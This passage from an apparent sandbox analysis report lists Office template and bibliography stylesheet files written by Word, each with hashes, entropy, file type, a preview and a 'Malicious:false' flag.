                                                                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                    Malicious:false
                                                                                    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):4888
                                                                                    Entropy (8bit):7.8636569313247335
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                    Malicious:false
                                                                                    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):6448
                                                                                    Entropy (8bit):7.897260397307811
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                    MD5:42A840DC06727E42D42C352703EC72AA
                                                                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                    Malicious:false
                                                                                    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):5630
                                                                                    Entropy (8bit):7.87271654296772
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                    Malicious:false
                                                                                    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):6193
                                                                                    Entropy (8bit):7.855499268199703
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                    Malicious:false
                                                                                    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3075
                                                                                    Entropy (8bit):7.716021191059687
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                    Malicious:false
                                                                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5151
                                                                                    Entropy (8bit):7.859615916913808
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                    Malicious:false
                                                                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):333258
                                                                                    Entropy (8bit):4.654450340871081
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):296658
                                                                                    Entropy (8bit):5.000002997029767
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):268317
                                                                                    Entropy (8bit):5.05419861997223
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):255948
                                                                                    Entropy (8bit):5.103631650117028
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                    MD5:9888A214D362470A6189DEFF775BE139
                                                                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):251032
                                                                                    Entropy (8bit):5.102652100491927
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):284415
                                                                                    Entropy (8bit):5.00549404077789
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                    MD5:33A829B4893044E1851725F4DAF20271
                                                                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):294178
                                                                                    Entropy (8bit):4.977758311135714
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                    Malicious:false
